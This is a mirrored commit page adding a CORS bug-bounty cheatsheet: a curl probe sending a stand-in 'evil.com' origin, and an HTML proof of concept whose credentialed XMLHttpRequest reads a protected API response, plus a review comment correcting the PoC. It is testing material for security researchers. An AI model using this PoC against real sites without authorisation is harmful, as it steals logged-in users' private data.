mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-24 20:13:06 +00:00
Create cors.md
We should create a CORS cheatsheet. Will add more in the future.
parent
9ceb1b7053
commit
a208ba5d18
1 changed files with 36 additions and 0 deletions
36
cheatsheets/cors.md
Normal file
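--- a/cheatsheets/cors.md
+++ b/cheatsheets/cors.md
@@ -0,0 +1,36 @@
+## Cross Origin Resource Sharing (CORS)
+
+Testing:
+`curl --head -s 'http://example.com/api/v1/secret' -H 'Origin: http://evil.com'`
+
+Check to see what the server responds with in the `Access-Control-Allow-Origin:` (if anything) and if so, check if `Access-Control-Allow-Credentials: true` is present.
+
+If it is trusting arbitrary origins **with** allow-credentials set to true, then host this HTML as a proof of concept.
+
+```
+<!DOCTYPE html>
+<html>
+<head><title>BugBounty CheatSheet</title></head>
+<body>
+<center>
+<h2>CORs POC</h2>
+
+<textarea rows="10" cols="60" id="pwnz">
+</textarea><br>
+<button type="button" onclick="cors()">Exploit</button>
+</div>
+
+<script>
+function cors() {
+var xhttp = new XMLHttpRequest();
+xhttp.onreadystatechange = function() {
+if (this.readyState == 4 && this.status == 200) {
+document.getElementById("pwnz").innerHTML = this.responseText;
+}
+};
+xhttp.open("GET", "http://example.com/api/v1/topsecret", true);
+xhttp.withCredentials = true;
+xhttp.send();
+}
+</script>
+```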
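Review bot: The PoC markup in the fenced block is not well-formed: `<center>` is opened but closed with `</div>`, and `</body>` and `</html>` never appear, so the close should read `</center>` with the two missing end tags added after `</script>`. In `cors()`, assigning the response through `innerHTML` runs it through the HTML parser, which decodes entities, so the textarea may not show the body as received; `document.getElementById("pwnz").value = this.responseText;` keeps it verbatim for the report. The testing paragraph should also state that the finding only holds when `Access-Control-Allow-Origin` echoes the supplied `Origin`, since browsers refuse `*` on credentialed requests and reports based on a wildcard are false positives. The curl line probes `/api/v1/secret` while the PoC requests `/api/v1/topsecret`; using one path in both would keep the example consistent.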